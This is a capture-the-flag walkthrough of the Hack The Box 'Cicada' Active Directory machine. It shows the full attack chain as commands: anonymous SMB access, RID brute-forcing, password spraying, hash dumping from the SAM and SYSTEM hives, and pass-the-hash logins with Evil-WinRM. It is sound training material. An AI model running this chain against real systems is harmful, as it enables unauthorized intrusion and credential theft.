Cicada HTB Walkthrough Link to heading

Step 1: Initial Enumeration with Nmap Link to heading

The first step in attacking Cicada HTB is performing an Nmap scan to identify open ports and running services.

sudo nmap -sV -sC -oA nmap/cicada 10.10.11.35

Nmap Results Link to heading

The scan revealed several open ports, including:

  • LDAP (389, 636, 3268, 3269)
  • SMB (445)
  • Kerberos (88)
  • MSRPC (135, 593)
  • DNS (53)

This indicates an Active Directory (AD) environment, which suggests possible attacks related to SMB, Kerberos, and LDAP.

Step 2: Enumerating SMB Shares Link to heading

Next, we check for accessible SMB shares:

smbclient -N -L //10.10.11.35

Discovered Shares:

  • ADMIN$
  • C$
  • DEV
  • HR
  • NETLOGON
  • SYSVOL

Step 3: Downloading HR Notices Link to heading

Attempting to access the HR share without authentication:

smbclient //10.10.11.35/HR -U ""
get "Notice from HR.txt"

Inspecting the file:

cat Notice\ from\ HR.txt

This provides a default password:

Your default password is: Cicada$M6Corpb*@Lp#nZp!8

Step 4: Enumerate Users with SMB Link to heading

Using NXC to enumerate all user RIDs:

nxc smb 10.10.11.35 -u '.' -p "" --rid-brute

Step 5: Password Spraying with CME Link to heading

Using CrackMapExec (CME) to spray the default password across users:

cme smb 10.10.11.35 -u user.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'

Success: Link to heading

We discover the user michael.wrightson with valid credentials.

Step 6: Extracting User Descriptions Link to heading

Using CrackMapExec to check user descriptions:

crackmapexec smb 10.10.11.35 -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' --users

This reveals another user’s password:

cicada.htb\david.orelious : Just in case I forget my password is aRt$Lp#7t*VQ!3

Step 7: Accessing the DEV Share Link to heading

Using David’s credentials to explore the DEV share:

smbclient //10.10.11.35/DEV -U 'david.orelious%aRt$Lp#7t*VQ!3'
smb: \> dir
smb: \> get backup_script.ps1

Step 8: Gaining a PowerShell Shell Link to heading

The backup script reveals another password for Emily. Using Evil-WinRM to get a shell:

evil-winrm -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt' -i 10.10.11.35

Inside the shell, navigate to the desktop and retrieve user.txt:

cd C:\Users\emily.oscars\Desktop
cat user.txt

Step 9: Extracting SYSTEM & SAM Files Link to heading

To escalate privileges, dump the SAM & SYSTEM registry files:

reg save hklm\sam sam
reg save hklm\system system

Step 10: Dumping Admin Hash Link to heading

Using impacket-secretsdump to retrieve NTLM hashes:

impacket-secretsdump -sam sam -system system local

The dump reveals the Administrator NTLM hash.

Step 11: Logging in as Administrator Link to heading

Using Evil-WinRM with the extracted hash:

evil-winrm -u Administrator -H 2b87e7c93a3e8a0ea4a581937016f341 -i 10.10.11.35

Once inside, retrieve root.txt:

cd C:\Users\Administrator\Desktop
cat root.txt

Conclusion Link to heading

By leveraging SMB enumeration, password spraying, and privilege escalation, we successfully exploited the Cicada box and obtained both user and root flags. This demonstrates the importance of strong passwords, SMB hardening, and monitoring Active Directory environments for unauthorized access attempts.